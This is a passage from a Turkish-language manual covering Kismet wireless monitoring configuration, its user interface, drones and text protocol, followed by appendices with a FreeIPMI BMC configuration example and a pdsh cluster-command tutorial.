wepkey=bssid,hexkey
Yalnız onaltılı anahtar yazılabilir. WEP için değişik üreticilerde şifre
sözcüğünü çeviren belirgin ve tutarlı bir yöntem olmadığından kullanılmaz.
Kismet sunucusu ses ve konuşma üretebilir. Ama bunun Kismet kullanıcı
arayüzü tarafından yapılması daha uygundur. Kismet sunucusunda ses
varsayılan olarak kapatılmıştır.
enablesound=true|false Ses açıp kapama
soundbin=... Ses için programın yolu ve seçenekleri
sound=xxx,true|false Ses tetikleyicisi xxx açma
enablespeech=true|false
Konuşma açık kapalı
speechbin=...
Metni konuşmaya çeviren program

speechtype=raw|festival
Eğer Festival (ama flite değil) kullanılıyorsa tip “festival” olarak
atanmalıdır. Diğer tüm araçlar “raw” (ham) olmalıdır.
Speechencoding=...
NATO, Konuşmanın hecelenmesi, Konuşulması, Çözümlenmesi
alanları için açıklık, heceleme ağları SSID'leri (NATO gibi),
seslendirilen harfler ya da normal olarak konuşma burada
tanımlanır.
speech=xxx,"format"
Konuşulanları dizisi ve kalıbı bu seçenekte tanımlanır. Kismet
kullanıcı arayüzü bölümü daha çok bilgi için konuşma dizilerinin
kalıbı ve bilgisini içerir.
OUI dosyası (Bir cihazın üreticisini bulmak için Kismet tarafından kullanılır)
aynı kalıbı kullandıkları sürece başka araçlarla da paylaşılabilir (Wireshark
gibi). Varsayılan olarak Kismet aşağıdaki yolları arar:
/etc/manuf
/usr/share/wireshark/wireshark/manuf
/usr/share/wireshark/manuf
Başka yollar “ouifile=” seçeneği ile eklenebilir.
14. Kismet Kullanıcı Arayüzü
Varsayılan Kismet arayüzü metin tabanlı ncurses kitaplığını kullanır. Kismet
web sayfasından (http://www.kismetwireless.net/links.shtml) ek kullanıcı
arayüzleri bulunabilir.
Kismet kullanıcı arayüzü herhangi bir curses uygulaması gibidir. Menü “Esc”,
“`” ya da “~” tuşlarıyla etkinleştirilir. Bilgi alanları arasındaki geçiş “tab”
tuşuyla sağlanır.
Fare kullanımı Kismet kullanıcı arayüzündeki gibi sağlanır. Ama sayfaların
hepsi tümüyle fare işlemlerini desteklemez. Kullanıcı arayüzünde tuş takımı
olmadan çalışma kabul edilebilir bir durumdur.
Ana Kismet penceresi ağları adlarını içerir. GPS bilgisi, o anki sunucu
istatistikleri ve paket kaynak durumu ve durum paneli (hataların ve
duyuruların yazıldığı) vardır. Ana menüdeki parçalar “View” (göster) menü
seçeneği ile kullanılabilir.
Özellikler (Preference)
Kismet kullanıcı arayüzü ayarları tümüyle kullanıcı arayüzü içinden
“Kismet->Preferences->...” menü seçeneğinden yapılır. Özelliklerdeki
değişiklikler hemen uygulanır ve yeniden başlatmak gerekmez.

Varsayılan olarak Kismet kullanıcı arayüzü başlangıçta Kismet
sunucusunu başlatmak için sorgu girişi hazırlar. Bu davranış (sunucu
başlatma ve bağlantı kurma gibi) Başlama (Startup) ve Bitiş
(Shutdown) özelliklerinden değiştirilebilir.
Kismet sunucusunu başlatma penceresini otomatik açma
Kismet sunucu başlatma penceresini kullanıcı arayüzü
yüklendiğinde açar (eğer sunucu çalışmıyorsa).
Başlangıçta sunucu başlatmayı sorma:
Sunucu başlatmayı sor (sunucu penceresi açmak yerine)
Kismet sunucu konsolunu varsayılan olarak göster:
Sunucuyu başlattıktan sonra otomatik olarak Kismet sunucu
konsolu penceresini aç:
Kismet sunucusunu iş bitiminde (exit) kapat (shutdown):
Otomatik başlatılan sunucuları öldür (kill) komutu verilir ve
uzaktaki sunuculara da kapanma (shutdown) mesajı gönderilir.
Kismet sunucusunu kapatmadan önce sorgu gönderme
Onay almadan sunucuları öldürme.
Kismet menüleri kısaltmaları destekler. Örneğin “~WI” “Windows-
>Client List” menü seçeneği ile aynı anlama gelir.
Ses ve Konuşma
Kismet kullanıcı arayüzü birçok kullanıcı için ses ve konuşmayı ele alır.
Ses çok sıradan bir işlemdir ( /usr/local/share/kismet/wav altındaki
WAV dosyalardan oynatılır).
Konuşma Festival ve Flite ile desteklenir. Diğer metinden konuşmaya
türü programlar da çalışabilir (açık ve düz metin bilgisini standart
girişten alıyorlarsa). Konuşma metinleri konuşma olayının türüne göre
kodlanabilir (örneğin %1, %2 vb Kismet tarafından verilerle
değiştirilir). Desteklenen olaylar ve değişiklikler:
Yeni Ağ:
Ağ SSID konuşma kodlama ayarlarına göre düzenlenir
Ağ kanalı
Ağ BSSID
Uyarı:
Uyarı tipi
GPS Kayıp, GPS Kilit
Değiştirme seçenekleri yok

Ağları İşaretlemek
Kismet ağ için özelleştirilmiş verileri işaretler biçiminde ekler.
Kistem'te kullanıcı arayüzü, ağlar ve istemciler kendilerine işaret
eklenmiş olarak saklanabilirler. Bu işaretler kullanıcı arayüzünün ağ
ayrıntılarında bulunur ve hem metin hem de XML dosyalarına yazılır.
İşaretler değişmez ve sürekli tanımlanabilir. Ağ ve istemcilerde
“Unutma” kutusu işaretlenince, Kismet yeniden başlatıldığında bu
değerler kaybolmadan kullanılır.
İstemci işareti belirtilen bir ağda belirli bir istemciye verilen addır. Şu
anda istemcinin her anına eklenebilecek bir mekanizma yoktur.
Sıralama (sırting)
Kismet'in “autofit” konumu varsayılan ayardır. Ekrana aktif ağlardan
koyabildiği kadar çoğunu sığdırmak ister. “autofit” konusu çok
değişken olduğundan, bu konumda ağları seçmenin bir anlamı olmaz.
Bir ağ seçmek ve ayrıntıları göstermek için önce “Sort” menüsündeki
başka bir yöntemle ağlar sıralanır, daha sonra ağ seçilir.
15. Kismet drones (yan ürünleri)
Kismet yan ürünleri, Kismet'i dağıtılmış IDS sistemine dönüştürür. Drones
Kismet'in desteklediği tüm yakalama yöntemlerini destekler. Bunlara Drone
için çoklu yakalama cihazları da dahildir. Drone kablosuz ağ verilerini yakalar
ve Kismet suncu üzerinden ikincil bir bağlantıya yönlendirir (örneğin kablolu
ethernet ağı). Drone paketlerin çözülmesiyle uğraşmaz ve enküçük donanım
ortamına göre çalışır.
Bir Kismet sunucusu drone'lara bağlanır ve bir kullanıcı arayüzü olan Kismet
görüntüler, paket yazma ve uyarı oluşturma buradan yapılır. Uzaktaki Kismet
üzerindeki yakalama kaynakları, Kismet sunucusuna yönlendirilir ve
bağımsız bir yakalama cihazı gibi görünüp kanal sekmelerine, kilitlemelerine
göre ayarlanır.
Tun/tap dışa çıkartma işlevini kullanarak Kismet sunucusu tüm bağlı
drone'lardan gelen paketleri sanal ağ arayüzüne çıkarabilir. Böylece
dışarıdaki bir IDS/paket yakalama sistemi (Snort gibi) bunları kullanabilir.

Drone'ları kullanabilmek için önce uzaktaki sistemde kismet_drone başlatılır
(kismet_drone.conf değiştirilerek ayarlar kullanıma uygun hale getirilir.
Örneğin hangi bilgisayarların bağlanacağı bilgisi gibi). Ya da kimet
sunucusundaki drone olanaklarının (kismetserver.conf dosyasındaki)
açılmasıyla sağlanır. kismet_server drone olarak çalıştığında, yerel log
yazma her zamanki gibi davranır ve kismet istemcileri sunucuya aynı normal
biçimiyle bağlanır. kismet_drone çalıştırılırken istemciler doğrudan
bağlanamaz ve log yazılmaz. Bunların olması için Kismet sunucusu, sunucu
olarak başlatılmış olmalıdır. Böylece paket kodlama ve açma yanında
Kismet kullanıcı arayüzü bağlantıları oluşur.
16. Kismet'le konuşma
Kismet'in istemci/sunucu protokolü temel metindir. Kismet'le iletişim telnet y
ada netcat gibi temel programlarla bile sağlanır. Ama ciddi uygulamalar için
tüm protokol olanaklarını kullanan bir arayüz olmasında yarar vardır.
Bu belge Kismet protokolünü ve iletişimin temel ilkelerini anlatır. Daha geniş
ve ayrıntılı bilgi için kaynak koda başvurulmalıdır. Daha geniş bir belge
ileride sağlanabilir.
Kismet protokolü komutlar ve yanıt cümlelerinden oluşur. Bir komut:
!ID COMMAND OPT1 OPT2 OPT3
biçimindedir. Burada ID bir sayıdır (doğru bir hata denetimi için tekil
olmalıdır) kalanlar ise komut ve onun alabileceği parametre değerleridir.
Seçeneklerin içinde boşluklar varsa ve seçenek tek bir parametre değeri
olarak belirtiliyorsa bunları “\001....\001” arasında belirtmek gerekir.
Ve yanıtlar daa aşağıdaki kalıba göre hazırlanır:
*HEADER f1 f2 f3 f4
Burada HEADER cümle tipidir ve kalanlar ise istenen bilgi alanlarıdır. Yanıt
istenilen sırada verilir.
Bilgi alanları ACII düz metindir. İstemci bu değerin terminal açısından
yazılabilir olduğunu bilmesinde yarar vardır.
İçinde boşluklar olan alanların \001...\001 işaretleri arasında göndrilmesi bu
alanın içinde boşluklarla değerledirilmesi gerektiğini belirtir. Bunlar herhangi
alanda olabileceklerinden protokol tarayıcı programlar bu tür metinleri
algılayabilmelidir.

Temel Kismet koutları şunlardır:
!{#} SHUTDOWN
Kismet programını durdur.
!{#} CAPABILITY {cümle}
Protokol için alanları sorgulamadır. Sonuç *CAPABILITY cümle
biçiminde döner.
!{#} ENABLE {cümle} {alanlar}|{*}
Bir cümleyi aç, ya alanları istenilen sırada dizerek ya da * ile
varsayılan sırada tüm alanları isteyerek bu açılım yapılır.
!{#} REMOVE {cümle}
Bir cümleyi kaldır. Ya da onu göndermeyi durdur.
!{#} ADDNETTAG {BSSID} {Sabit} {İşaret adı} {işaret içeriği}
Ağa rastgele bir işaret daha ekle. Eğer sabitse,
~(kismet/tags.conf altında saklanır.
!{#} DELNETTAG {BSSID} {İşaret adı}
Bir işareti sil.
!{#} ADDCLITAG {BSSID} {MAC} {Sabit} {işaret} {içerik}
Ağdaki belirtilen istemciye işaret ekle.
!{#} DELCLITAG {BSSID} {MAC} {işaret}
İşareti sil
!{#} ADDSOURCE {kaynak satırı}
Kaynağı dinamik olarak ekle. Kaynak satırı “ncurses=” satırı ile
aynı olmalıdır.
Protokol Cümleleri:
Bir cümle kullanıma açıldığında var olan cümle verisi hemen gönderilir.
(protokol göstergeleriyle). Ek veriler deltalar biçiminde gönderilir.
İşlem zamanı ve bant aralığı dikkate alınır. Yalnız değişen veriler
gönderilir. Örneğin *BSSID cümlesi gönderildiğinde bir blok *BSSID
verisi gönderilir. Bunlar daha önce Kismet tarafından saptanan ağ
bilgileridir. Bu cümle durduruluncaya dek gönderme yapılır. Her saniye
bir kayıt gönderilir. Ağlardaki her değişiklikte değişen bilgi gönderilir.

Zorunlu cümleler:
Kismet istemcinin en az aşağıdaki protokolü kabul edebilmesini ister.
En azından istemci yanıt veremiyorsa, bunların tümünü unutmalıdır.
Komutlar REMOVE komutuyla kapatılabilir. Genelde istemci anlamadığı
her komutu kapatmalıdır.
*KISMET
Temel Kismet başlama bilgisi.
*PROTOCOLS
Desteklenen cümlelerin listesi.
*ACK
Komut yanıtı.
*ERROR
Komut hatası olduğunda...
*TIME
Sunucunun zaman damgası.
Örnekler:
echo -e '\n!0 enable channel channel,networks' | nc localhost 2501
*CHANNEL cümlesi “channel” ve “networks” adlı alanlar ile açılır.
Sonuç aşağıdaki gibidir:
*ACK: 0 OK
*CHANNEL: 1 4
*CHANNEL: 3 1
*CHANNEL: 4 1
*TIME: 1245176426

Ek-4
bnc config
(http://www.gnu.org/software/freeipmi/bmcconfig-example.conf)
#
# Bölüm UserX Açıklamalar
#
# Aşağıdaki kullanıcı bölümlerinde, kullanıcılar kullanıcı adlarını, şifrelerini
# ve yerel ağ üzerinden IPMI erişim yetkilerini yapılandırırlar. Kullanıcı adları
# User1 dışında herhangi bir karakter dizisi olabilir. Çünkü User1 IPMI'da
# anonymous kullanıcı adı olarak belirlenmiştir.
#
# Yerel ağ üzerinden IPMI erişimi için “Enable_User” değerini “Yes” yapın.
# “Lan_Enable_IPMI_Msgs” değerini “Yes” ve “Lan_Privilege_Limit” değerini yetkili
# düzeyine çıkartın. Yetki düzeyi IPMI bazı işlemlerinde kullanıcı adlarına göre
# sınırlamalar getirmekte kullanılır. Ama en az yetkili düzeyinde en az bir
# kullanıcı sınırları “Administrator” olmalıdır. O zaman yerel ağ üzerinden tüm
# IPMI işlemleri bu kullanıcıya açılmış olur. Güvenlik nedeniyle User1 (anonymous
# kullanıcı) açılmamalıdır. Bir çok kullanıcı için “Lan_Session_Limit” sıfır
# olmalıdır. Böylece aynı anda yerel ağ üzerinden bir çok oturum açılabilir.
# Eğer sisteminiz IPMI 2.0 destekliyorsa ve Serial-over-LAN (SOL) varsa,
# “SOL_Payload_Access” alanını kullanıcı erişimlerinin SOL kullanımını açmak ya da
# kapamak için “Yes” ya da “No” yapın.
#
# Denemeler sırasında açılmış olabilecek olan “Password” alanını açıklama yapmayı
# unutmayın.
#
# Bazı ana kartlarda “Username” alanının okunan/yazılan diğer alanlardan önce
# tanımlanması gerekebilir. Eğer durum böyleyse bu alanlar username-not-set-yet>
# (kullanıcı adı henüz atanmamış) diye tanımlanır.
#
Section User1
## Kullanıcı adı tanımla
## Username NULL
## Olası Değerler: Yes/No ya da seçmemek için boşluk
Enable_User
No
## Ya şifre girin ya da silmek için boşluk girin.
## En çok 16 karakter (IPMI 2.0 Destekleniyorsa 20 karakter).
## Password
## Olası Değerler: Yes/No
Lan_Enable_IPMI_Msgs
No
## Olası Değerler: Yes/No
Lan_Enable_Link_Auth
No
## Olası Değerler: Yes/No
Lan_Enable_Restricted_to_Callback
No
## Olası Değerler:
Callback/User/Operator/Administrator/OEM_Proprietary/No_Access
Lan_Privilege_Limit
No_Access

## Olası Değerler: 0-17, 0 (sıfır limitsiz);
## Belirtilmezse sıfır atanır
## Lan_Session_Limit (yerel ağ oturum sınırı)
## Olası Değerler: Yes/No
SOL_Payload_Access
No
EndSection
Section User2
## Kullanıcı adı girin
Username
user
## Olası Değerler: Yes/No ya da seçmemek için boşluk
Enable_User
Yes
## Ya şifre girin ya da silmek için boşluk girin.
## Password
## Olası Değerler: Yes/No
Lan_Enable_IPMI_Msgs
Yes
## Olası Değerler: Yes/No
Lan_Enable_Link_Auth
No
## Olası Değerler: Yes/No
Lan_Enable_Restricted_to_Callback
No
## Olası Değerler:
Callback/User/Operator/Administrator/OEM_Proprietary/No_Access
Lan_Privilege_Limit
User
## Olası Değerler: 0-17, 0 is (sıfır limitsiz);
## Belirtilmezse sıfır atanır
## Lan_Session_Limit
## Olası Değerler: Yes/No
SOL_Payload_Access
No
EndSection
Section User3
## Kullanıcı adı girin
Username
operator
## Olası Değerler: Yes/No ya da seçmemek için boşluk
Enable_User
Yes
## Ya şifre girin ya da silmek için boşluk girin.
## Password
## Olası Değerler: Yes/No
Lan_Enable_IPMI_Msgs
Yes
## Olası Değerler: Yes/No
Lan_Enable_Link_Auth
No
## Olası Değerler: Yes/No
Lan_Enable_Restricted_to_Callback
No
## Olası Değerler:
Callback/User/Operator/Administrator/OEM_Proprietary/No_Access
Lan_Privilege_Limit
Operator
## Olası Değerler: 0-17, 0 (sıfır limitsiz);
## Belirtilmezse sıfır atanır
## Lan_Session_Limit
## Olası Değerler: Yes/No
SOL_Payload_Access
No
EndSection
Section User4
## Kullanıcı adı girin
Username
admin
## Olası Değerler: Yes/No ya da seçmemek için boşluk
Enable_User
Yes
## Ya şifre girin ya da silmek için boşluk girin.
## Password
## Olası Değerler: Yes/No

Lan_Enable_IPMI_Msgs Yes
## Olası Değerler: Yes/No
Lan_Enable_Link_Auth
No
## Olası Değerler: Yes/No
Lan_Enable_Restricted_to_Callback
No
## Olası Değerler:
Callback/User/Operator/Administrator/OEM_Proprietary/No_Access
Lan_Privilege_Limit
Administrator
## Olası Değerler: 0-17, 0 (sıfır limitsiz);
## Belirtilmezse sıfır atanır
## Lan_Session_Limit
## Olası Değerler: Yes/No
SOL_Payload_Access
No
EndSection
#
# Lan_Channel (Yerel ağ kanalı) Bölümü Açıklamaları
#
# Yerel ağ kanalı bölümünde, genelde yerel ağ üzerinden IPMI açılır ya da
# kapatılır.
# Yukarıdaki uçucu yapılandırmalar BMC üzerine hemen güncellenir ve sistem
# üzerinde anlık etki gösterir.
# Kalıcı (Non_Volatile) yapılandırmalar bir sonraki sistem açılışında devreye
# girer. Bu nedenle genel olarak hem uçucu hem de kalıcı ayarlar eşit olmalıdır.
#
# Yerel ağ üzerinden IPMI açmak için “Access Mode” (erişim konumu) “Alway
# Available” (her zaman var) olarak değer almalıdır.
# "Channel_Privilege_Limit" değeri kendisinin tanımlandığı kullanıcı için en
# yüksek yetki seviyesine çıkarılmalıdır. Tipik olarak bu kullanıcı
# “Administrator” olur.
#
# Ek güvenlik için "User_Level_Auth" ve "Per_Message_Auth" tipik olarak "Yes"
# değerini alır.
#
Section Lan_Channel
## Olası Değerler: Disabled/Pre_Boot_Only/Always_Available/Shared
Volatile_Access_Mode
Always_Available
## Olası Değerler: Yes/No
Volatile_Enable_User_Level_Auth
Yes
## Olası Değerler: Yes/No
Volatile_Enable_Per_Message_Auth
Yes
## Olası Değerler: Yes/No
Volatile_Enable_Pef_Alerting
No
## Olası Değerler: Callback/User/Operator/Administrator/OEM_Proprietary
Volatile_Channel_Privilege_Limit
Administrator
## Olası Değerler: Disabled/Pre_Boot_Only/Always_Available/Shared
Non_Volatile_Access_Mode
Always_Available
## Olası Değerler: Yes/No
Non_Volatile_Enable_User_Level_Auth
Yes
## Olası Değerler: Yes/No
Non_Volatile_Enable_Per_Message_Auth
Yes
## Olası Değerler: Yes/No
Non_Volatile_Enable_Pef_Alerting
No
## Olası Değerler: Callback/User/Operator/Administrator/OEM_Proprietary
Non_Volatile_Channel_Privilege_Limit
Administrator
EndSection
#
# Lan_Conf Bölümü Açıklamaları
#

# Lan_Conf bölümünde, tipik ağ yapılandırması kurulur. Bir çok kullanıcı için IP
# adres kaynağı “statik” (değişmez) olarak belirlenir. "IP_Address_Source"
# alanında bu bilgisayar için “IP Address” (IP adresi), “MAC_Address” (MAC
# adresi), “Subnet_Mask” (Ağ alt maskesi) vb. Uygun bir değer atanır.
#
Section Lan_Conf
## Olası Değerler: Unspecified/Static/Use_DHCP/Use_BIOS/Use_Others
IP_Address_Source
Static
## Geçerli IP adres girin
IP_Address 192.168.1.1
## Geçerli MAC adres girin
MAC_Address
00:30:52:AC:18:22
## Geçerli Alt ağ Maskesi girin
Subnet_Mask 255.255.255.0
## Geçerli IP adres girin
Default_Gateway_IP_Address 132.19.2.1
## Geçerli MAC adres girin
Default_Gateway_MAC_Address
00:30:52:AC:1C:23
## Geçerli IP adres girin
Backup_Gateway_IP_Address 132.19.2.2
## Geçerli MAC adres girin
Backup_Gateway_MAC_Address
00:30:52:AC:23:24
EndSection
#
# Lan_Conf_Auth Bölüm Açıklamaları
#
# Lan_Conf_Auth bölümünde, IPMI 1.5 için izin verilen şifreleme denetimi
# yapılandırılır. Bir çok kullanıcı “MD5” şifre denetimine “Yes” demek ister.
# Kalanlarına da “No” derler. Eğer NULL kullanıcı adı ve NULL şifre
# tanımlamışsanız, bazı “None” alanlarına da “Yes” demek istersiniz. Böylece
# “None” şifre denetimi çalışabilir. Bazı ana kartlar sizlerin OEM şifre denetimi
# yapmanıza izin vermez. O zaman tüm OEM ile ilgili alanlara “No” demeniz gerekir.
#
Section Lan_Conf_Auth
## Olası Değerler: Yes/No
Callback_Enable_Auth_Type_None
No
## Olası Değerler: Yes/No
Callback_Enable_Auth_Type_MD2
No
## Olası Değerler: Yes/No
Callback_Enable_Auth_Type_MD5
No
## Olası Değerler: Yes/No
Callback_Enable_Auth_Type_Straight_Password No
## Olası Değerler: Yes/No
User_Enable_Auth_Type_None
No
## Olası Değerler: Yes/No
User_Enable_Auth_Type_MD2
Yes
## Olası Değerler: Yes/No
User_Enable_Auth_Type_MD5
Yes
## Olası Değerler: Yes/No
User_Enable_Auth_Type_Straight_Password No
## Olası Değerler: Yes/No
Operator_Enable_Auth_Type_None
No
## Olası Değerler: Yes/No
Operator_Enable_Auth_Type_MD2
Yes
## Olası Değerler: Yes/No
Operator_Enable_Auth_Type_MD5
Yes
## Olası Değerler: Yes/No
Operator_Enable_Auth_Type_Straight_Password No

## Olası Değerler: Yes/No
Admin_Enable_Auth_Type_None
No
## Olası Değerler: Yes/No
Admin_Enable_Auth_Type_MD2
Yes
## Olası Değerler: Yes/No
Admin_Enable_Auth_Type_MD5
Yes
## Olası Değerler: Yes/No
Admin_Enable_Auth_Type_Straight_Password No
## Olası Değerler: Yes/No
OEM_Enable_Auth_Type_None
No
## Olası Değerler: Yes/No
OEM_Enable_Auth_Type_MD2
Yes
## Olası Değerler: Yes/No
OEM_Enable_Auth_Type_MD5
Yes
## Olası Değerler: Yes/No
OEM_Enable_Auth_Type_Straight_Password No
EndSection
#
# Lan_Conf_Security_Keys bölümü açıklamaları
#
# Eğer sisteminiz IPMI 2.0 destekliyorsa ve yerel ağ üzerinden seri bağlantı (SOL)
# varsa, K_g BMC anahtarı ayarı gerekebilir. K_g anahtarı seçimlik olup
# IPMI 2.0'da iki anahtar şifre denetimi için ayarlanabilir. Seçimlik
# ayarlanabilir ama pek çok kullanıcı bunu sıfır ya da boşluk olarak kullanır.
#
Section Lan_Conf_Security_Keys
## Bir dizi gir ya da silmek için boşluk gir
## En çok 20 karakter olabilir, onaltılı giriş için önünde 0x olmalıdır.
## K_G
EndSection
#
# Lan_Conf_Misc Bölümü Açıklaması
#
# Aşağıdaki diğer yapılandırma seçenekleri üretici tarafından seçimlik
# uyarlanmıştır. Sizin sisteminizde hiç olmayabilir ya da aşağıdaki gibi görünmez.
#
# Eğer değeri "Yes" ise, "Enable_Gratuitous_ARPs" sürekli karşılıksız ARP
# gönderecek biçimde BMC'yi uyarır. Böylece ağ içindeki diğer bilgisayarlar da
# kendi BMC'lerindeki MAC adreslerini düznlerler. Bir çok kullanıcı bunun değerini
# “Yes” yapmak ister. Çünkü BMC IP adres çözümü için en ucuz yoldur. Ama sizin
# ağınızdaki trafiği arttırır. "Gratuitous_ARP_Interval" karşılıksız gönderilen
# ARP için süreyi tanımlar.
#
# Eğer değeri "Yes" ise, "Enable_ARP_Response" diğer bilgisayarlardan gelen ARP
# isteğine yanıt için BMC'yi uyarır.
#
Section Lan_Conf_Misc
## Olası Değerler: Yes/No
Enable_Gratuitous_ARPs
No
## Olası Değerler: Yes/No
Enable_ARP_Response
Yes
## Olası Değerler: 0-255, 500ms arttırımlarla (yani 2 = 1000ms)
Gratuitous_ARP_Interval 3
EndSection
#
# Rmcpplus_Conf_Privilege Bölümü Açıklamaları
#
# Sisteminiz IPMI 2.0 destekliyorsa ve Ağ üzerinden Ser bağlantı (SOL) varsa,

# “cipher suite ID” değerleri aşağıdaki gibi olabilir:
# Rmcpplus_Conf_Privilege bölümünde, IPMI 2.0 altında desteklenen en yüksek
# kullanıcı yetki düzeyi desteklenen “chiper suite ID” çeşitleri için aşağıda
# gösterilmiştir.
# Her chiper suite ID değişik şifre denetleme, bütünlük ve kriptolama
# algoritmaları kümelerini destekler. EN yüksek yetki düzeyi olan kullanıcı
# “chiper suiteID” destekler olmalıdır. Bu da tipik olarak “Administrator” olur.
#
Section Rmcpplus_Conf_Privilege
## Olası Değerler: Unused/User/Operator/Administrator/OEM_Proprietary
Maximum_Privilege_Cipher_Suite_Id_0
Unused
## Olası Değerler: Unused/User/Operator/Administrator/OEM_Proprietary
Maximum_Privilege_Cipher_Suite_Id_1
Unused
## Olası Değerler: Unused/User/Operator/Administrator/OEM_Proprietary
Maximum_Privilege_Cipher_Suite_Id_2
Unused
## Olası Değerler: Unused/User/Operator/Administrator/OEM_Proprietary
Maximum_Privilege_Cipher_Suite_Id_3
Administrator
## Olası Değerler: Unused/User/Operator/Administrator/OEM_Proprietary
Maximum_Privilege_Cipher_Suite_Id_6
Unused
## Olası Değerler: Unused/User/Operator/Administrator/OEM_Proprietary
Maximum_Privilege_Cipher_Suite_Id_7
Unused
## Olası Değerler: Unused/User/Operator/Administrator/OEM_Proprietary
Maximum_Privilege_Cipher_Suite_Id_8
Administrator
## Olası Değerler: Unused/User/Operator/Administrator/OEM_Proprietary
Maximum_Privilege_Cipher_Suite_Id_11
Unused
## Olası Değerler: Unused/User/Operator/Administrator/OEM_Proprietary
Maximum_Privilege_Cipher_Suite_Id_12
Administrator
EndSection
#
# SOL_Conf Bölümü Açıklamaları
#
# Sisteminiz IPMI 2.0 destekliyorsa ve yerel ağ üzerinden seri iletişimi varsa
(SOL), Aşağıdaki yapılandırma seçenekleri SOL ayarlarını belirtir.
#
# SOL'u açmak isteyen bir çok kullanıcı için en az "Enable_SOL" değeri “Yes”
# olmalıdır ve "SOL_Privilege_Level" değeri en yüksek yetki düzeyinde olmalıdır.
# Tanımlanan herhangi bir kulalnıcı (tipik olatak burada “Administrator”) güvenlik
# nedeniyle "Force_SOL_Payload_Authentication" ve "Force_SOL_Payload_Encryption"
# değerlerini "Yes" yapmalıdır. Ama zorunlu şifre denetimi ve kriptolama “chiper
# suite ID” desteklendiğinde "Non_Volatile_Bit_Rate" ve "Volatile_Bit_Rate" uygun
# “baud” hızına ayarlanmalıdır. Bu BIOS ya da işletim sistminde tanımlanmış olan
# hızla aynı olur.
#
Section SOL_Conf
## Olası Değerler: Yes/No
Enable_SOL
Yes
## Olası Değerler: Callback/User/Operator/Administrator/OEM_Proprietary
SOL_Privilege_Level
Administrator
## Olası Değerler: Yes/No
Force_SOL_Payload_Authentication
Yes
## Olası Değerler: Yes/No
Force_SOL_Payload_Encryption
Yes
## Give a non-zero valid integer. Each unit is 5ms
Character_Accumulate_Interval 5
## Give a valid number
Character_Send_Threshold 50
## Give a valid integer

SOL_Retry_Count 5
## Give a valid integer. Interval unit is 10ms
SOL_Retry_Interval 10
## Olası Değerler: Serial/9600/19200/38400/57600/115200
Non_Volatile_Bit_Rate 115200
## Olası Değerler: Serial/9600/19200/38400/57600/115200
Volatile_Bit_Rate 115200
## Give a valid port number
## SOL_Payload_Port_Number 623
EndSection

Ek-5
IPMI
HPC çevresinde Sunucu Aralığı Giriş/Çıkışlarını
(Hostrange Input/Output) Kullanma
Albert Chu
chu11@llnl.gov
Pdsh'e Giriş.
FreeIPMI'da birçok Sunucu aralığı (hostrange) giriş/çıkışları pdsh
araçları içinde modellenmiştir (Bakınız http://pdsh.sourceforge.net).
Pdsh paralel kabut hazır programı olup bir karşıdaki bir kümede
rastgele bir komut çalıştırmaktır. Algoritma olarak pdsh kayan
pencereler biçimindeki thread'ler yaratır. Her biri uzakta çalışan
“rcmd” özellikli bir kabuk oluşturur (rcmd ya da ssh gibi). Bir thread
bittiğinde başka sunucularda çalışacak biçimde hemen yenisi yaratılır.
Bu işlem tüm sunucular bitinceye dek sürer.
4 ile 2000 düğümden oluşan kümelerde Lawrence Livermore National
Laboratory (LLNL) çalışmalarında yöntem faydalı hale getirildi.
Kümelerde çalıştırılan komutlar saniyeler içinde oldu. Ve bir kabut
sorgusu içinde seri (sıralanmış) komutlar olarak çalıştı.
Burada bir pdsh örneği ele alınmıştır:
> pdsh -w “wopr[0-5]” hostname
wopr0: wopr0
wopr1: wopr1
wopr2: wopr2
wopr3: wopr3
wopr5: wopr5
wopr4: wopr4
Sizin kümenizdeki her düğümün host adının belirlenmesi çok ilginç
değildir. Ama sizin kümenizdekilerin aynı kernel ile çalıştırıldığını
bilmek istemeniz anlamlıdır.
> pdsh -w “wopr[0-5]” uname -r
wopr1: 2.6.9-65

wopr0: 2.6.9-65
wopr5: 2.6.9-65
wopr2: 2.6.9-65
wopr4: 2.6.9-65
wopr3: 2.6.9-65
Ama büyük ağlarda bu tür çıktı çok uzun olur. Özellikle komut her
düğüm için birden çok satır üretirse çıktı boyu uzar da uzar. Örneğin
bri ayar dosyasının tüm düğümlerde doğru olup olmadığını öğrenmek
istesem:
>pdsh -w “wopr[0-5]” “cat /tmp/pretend_config”
wopr1: foo=/usr
wopr1: bar=/tmp
wopr1: baz=/etc
wopr1: xyzzy=static
wopr1:
wopr0: foo=/usr
wopr0: bar=/tmp
wopr0: baz=/etc
wopr0: xyzzy=static
wopr0:
wopr2: foo=/usr
wopr2: bar=/tmp
wopr2: baz=/etc
wopr2: xyzzy=dynamic
wopr2:
wopr4: foo=/usr
wopr4: bar=/tmp
wopr4: baz=/etc
wopr4: xyzzy=static
wopr4:
wopr5: foo=/usr
wopr5: bar=/tmp
wopr5: baz=/etc
wopr5: xyzzy=static
wopr5:
wopr3: foo=/usr
wopr3: bar=/tmp
wopr3: baz=/etc
wopr3: xyzzy=static
wopr3:
Bu yöntem çok zor anlaşılır olmaya başlar. Ama komutu aşağıdaki gibi
yazarsak:
>pdsh -w “wopr[0-5]” “cat /tmp/pretend_config” | dshbak
----------------
wopr1
----------------
foo=/usr
bar=/tmp
baz=/etc
xyzzy=static

----------------
wopr3
----------------
foo=/usr
bar=/tmp
baz=/etc
xyzzy=static
Bu daha düzgün okunabilecek bir çıktıdır. Ama çıktı satır sayısı
çoğaldıkça çıktının ele alınması zorlaşır. Dshbak programı daha
kısaltılmış çıktı verebilir:
> pdsh -w “wopr[0-5]” “cat /tmp/pretend config” | dshbak -c
----------------
wopr[0-1,3-5]
----------------
foo=/usr
bar=/tmp
baz=/etc
xyzzy=static
----------------
wopr2
----------------
foo=/usr
bar=/tmp
baz=/etc
xyzzy=dynamic
Bu çok daha iyi bir çıktıdır. Burada anlaşıldığına göre düğümlerden
birinin ayarları farklıdır.
Bu tür kümelerde en önemli sorunlardan biri düğümlerden biri
kümeden çıkarılabilir. Bu nedenle pdsh gibi araçlar çıkarılan
düğümlerde zaman aşımına uğrayınca dek beklerler.
Örnekte wopr6 devre dışında kalmıştır.
> pdsh -w “wopr[0-6]” hostname
wopr0: wopr0
wopr1: wopr1
wopr4: wopr4
wopr2: wopr2
wopr5: wopr5
wopr3: wopr3
pdsh@wopri: wopr6: mcmd: connect failed: No route to host
real
user
sys
0m3.007s
0m0.003s
0m0.007s

Ama sizin sıradan kullanıcılarınız wopr6 düğümünün devre dışı
olduğunu bilmeyebilir. Ya da listeden sorunlu düğümleri çıkartmakla
uğraşmak istemeyebilir.
